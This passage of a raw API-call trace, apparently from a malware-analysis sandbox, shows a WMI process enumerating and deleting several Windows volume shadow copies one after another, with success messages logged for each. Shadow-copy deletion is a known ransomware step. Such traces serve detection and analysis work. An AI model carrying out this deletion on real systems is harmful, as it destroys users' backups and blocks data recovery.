dwFlags=0x2500, lpSource=0x37ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0206.760] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0206.760] malloc (_Size=0x68) returned 0x37daf0 [0206.760] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37daf0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0206.760] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0206.760] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0206.761] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0206.761] free (_Block=0x37daf0) [0206.761] free (_Block=0x37ee10) [0206.761] LocalFree (hMem=0x15b790) returned 0x0 [0206.761] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0208.969] IUnknown:Release (This=0x1d03d80) returned 0x0 [0208.969] malloc (_Size=0x800) returned 0x37ee10 [0208.969] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0208.969] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0208.969] malloc (_Size=0x20) returned 0x37fd50 [0208.969] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37fd50, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0208.969] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0208.969] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0208.970] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0208.970] free (_Block=0x37fd50) [0208.970] free (_Block=0x37ee10) [0208.970] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0208.971] malloc (_Size=0x18) returned 0x37bfb0 [0208.971] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0208.971] free (_Block=0x37bfb0) [0208.971] malloc (_Size=0x800) returned 0x37ee10 [0208.971] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0208.972] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0208.972] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0208.972] malloc (_Size=0x68) returned 0x37dc00 [0208.972] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dc00, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0208.972] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0208.972] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0208.972] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0208.972] free (_Block=0x37dc00) [0208.972] free (_Block=0x37ee10) [0208.972] LocalFree (hMem=0x15b790) returned 0x0 [0208.972] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0211.680] IUnknown:Release (This=0x1d03d80) returned 0x0 [0211.680] malloc (_Size=0x800) returned 0x37ee10 [0211.680] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0211.680] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0211.680] malloc (_Size=0x20) returned 0x37fe60 [0211.680] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37fe60, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0211.680] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0211.680] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0211.680] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0211.680] free (_Block=0x37fe60) [0211.681] free (_Block=0x37ee10) [0211.681] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0211.682] malloc (_Size=0x18) returned 0x37bfb0 [0211.682] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0211.682] free (_Block=0x37bfb0) [0211.682] malloc (_Size=0x800) returned 0x37ee10 [0211.682] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0211.682] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0211.682] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0211.682] malloc (_Size=0x68) returned 0x37dd10 [0211.682] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dd10, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0211.682] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0211.682] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0211.682] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0211.682] free (_Block=0x37dd10) [0211.682] free (_Block=0x37ee10) [0211.683] LocalFree (hMem=0x15b790) returned 0x0 [0211.683] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0213.235] IUnknown:Release (This=0x1d03d80) returned 0x0 [0213.235] malloc (_Size=0x800) returned 0x37ee10 [0213.235] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37ee10, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0213.235] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0213.235] malloc (_Size=0x20) returned 0x37ff70 [0213.279] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37ff70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0213.279] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0213.336] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0213.336] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0213.336] free (_Block=0x37ff70) [0213.336] free (_Block=0x37ee10) [0213.336] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0213.337] malloc (_Size=0x18) returned 0x37bfb0 [0213.337] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0213.338] free (_Block=0x37bfb0) [0213.338] malloc (_Size=0x800) returned 0x37d490 [0213.338] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0213.338] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0213.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0213.338] malloc (_Size=0x68) returned 0x37dca0 [0213.338] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0213.338] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0213.338] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0213.338] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0213.338] free (_Block=0x37dca0) [0213.338] free (_Block=0x37d490) [0213.338] LocalFree (hMem=0x15b790) returned 0x0 [0213.338] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0218.195] IUnknown:Release (This=0x1d03d80) returned 0x0 [0218.195] malloc (_Size=0x800) returned 0x37d490 [0218.195] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0218.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0218.195] malloc (_Size=0x20) returned 0x37dca0 [0218.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0218.195] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0218.195] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0218.195] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0218.195] free (_Block=0x37dca0) [0218.195] free (_Block=0x37d490) [0218.196] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0218.197] malloc (_Size=0x18) returned 0x37bfb0 [0218.197] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0218.197] free (_Block=0x37bfb0) [0218.197] malloc (_Size=0x800) returned 0x37d490 [0218.197] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0218.197] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0218.197] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0218.197] malloc (_Size=0x68) returned 0x37dca0 [0218.197] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0218.197] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0218.197] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0218.197] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0218.197] free (_Block=0x37dca0) [0218.197] free (_Block=0x37d490) [0218.197] LocalFree (hMem=0x15b790) returned 0x0 [0218.197] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0220.598] IUnknown:Release (This=0x1d03d80) returned 0x0 [0220.598] malloc (_Size=0x800) returned 0x37d490 [0220.598] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0220.598] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0220.599] malloc (_Size=0x20) returned 0x37dca0 [0220.599] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0220.599] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0220.599] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0220.599] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0220.599] free (_Block=0x37dca0) [0220.599] free (_Block=0x37d490) [0220.599] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0220.601] malloc (_Size=0x18) returned 0x37bfb0 [0220.601] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0220.601] free (_Block=0x37bfb0) [0220.601] malloc (_Size=0x800) returned 0x37d490 [0220.601] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0220.601] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0220.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0220.601] malloc (_Size=0x68) returned 0x37dca0 [0220.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0220.601] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0220.601] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0220.601] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0220.601] free (_Block=0x37dca0) [0220.601] free (_Block=0x37d490) [0220.601] LocalFree (hMem=0x15b790) returned 0x0 [0220.601] IWbemServices:DeleteInstance (in: This=0x1d03c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0222.305] IUnknown:Release (This=0x1d03d80) returned 0x0 [0222.305] malloc (_Size=0x800) returned 0x37d490 [0222.305] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0222.305] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0222.305] malloc (_Size=0x20) returned 0x37dca0 [0222.305] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0222.305] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0222.305] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0222.305] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0222.305] free (_Block=0x37dca0) [0222.305] free (_Block=0x37d490) [0222.305] IEnumWbemClassObject:Next (in: This=0x1d03d18, lTimeout=-1, uCount=0x1, apObjects=0x26f770, puReturned=0x26f780 | out: apObjects=0x26f770*=0x1d03d80, puReturned=0x26f780*=0x1) returned 0x0 [0222.306] malloc (_Size=0x18) returned 0x37bfb0 [0222.306] IWbemClassObject:Get (in: This=0x1d03d80, wszName="__PATH", lFlags=0, pVal=0x26f790*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0222.306] free (_Block=0x37bfb0) [0222.306] malloc (_Size=0x800) returned 0x37d490 [0222.306] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x37d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0222.306] FormatMessageW (in: dwFlags=0x2500, lpSource=0x37d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f6b8, nSize=0x0, Arguments=0x26f6c8 | out: lpBuffer="랐\x15") returned 0x67 [0222.306] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0222.306] malloc (_Size=0x68) returned 0x37dca0 [0222.306] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x37dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0222.307] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff482ab0 [0222.307] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0222.307] fflush (in: _File=0x7fefdf72ab0 | out: 